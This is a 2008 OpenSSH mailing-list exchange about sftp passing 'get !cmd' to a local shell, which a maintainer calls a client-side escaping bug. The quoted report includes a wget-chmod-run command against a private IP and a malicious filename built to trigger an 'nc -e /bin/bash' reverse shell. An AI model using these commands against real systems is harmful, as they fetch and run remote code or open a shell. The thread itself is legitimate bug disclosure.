Strange sftp input parameter handling, user assisted code execution?

Wed Jun 18 03:29:11 EST 2008

I would consider that the use of "get !ls" would be a client side bug in 
escaping (I suspect it should be filed as a ticket in 
bugzilla.mindrot.org).  sftp should translate "get !ls"  into either "get 
\!ls"  or into the quoted counterpart.

However, I'm not sure what this has to do with the server.  Since ! 
produces a local shell and has nothing to do with the remote server.

- Ben

On Tue, 17 Jun 2008, Roman Fiedler wrote:

> Hello list,
>
> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>
> sftp> get !xxxx
> /bin/bash: xxxx: command not found
> Shell exited with status 127
>
>
> sftp> get !/bin/ls -al
> total 2132
> drwxr-xr-x  4 admin users   4096 2008-06-17 16:33 .
> drwxr-xr-x 16 admin users  12288 2008-06-17 08:50 ..
> drwxr-xr-x  3 admin users      8 2008-05-21 18:38 gd
>
>
> sftp> get !wget http://10.255.255.2:1234/root ; chmod 0755 root ; ./root
> --16:54:37--  http://10.255.255.2:1234/root
>            => `root'
> Connecting to 10.255.255.2:1234... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 123
>
> 100%[====================================>] 123           13.59B/s
> ETA 00:00
>
> 16:55:49 (7.08 B/s) - `root' saved [123/123]
>
> ./root: line 1: afdasfasf: command not found
> ./root: line 3: asdfa: command not found
> Shell exited with status 127
> sftp>
>
> On a linux server I did not manage to create a file with a / in the
> name, but a manipulated server could return such filenames or other
> strategies do not need them, e.g.
> touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying
> to download is also a good one.
>
> Has someone observed this behavior?
> Is this just a strange thing but according to the specs or a bug?
>
> lg roman
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
>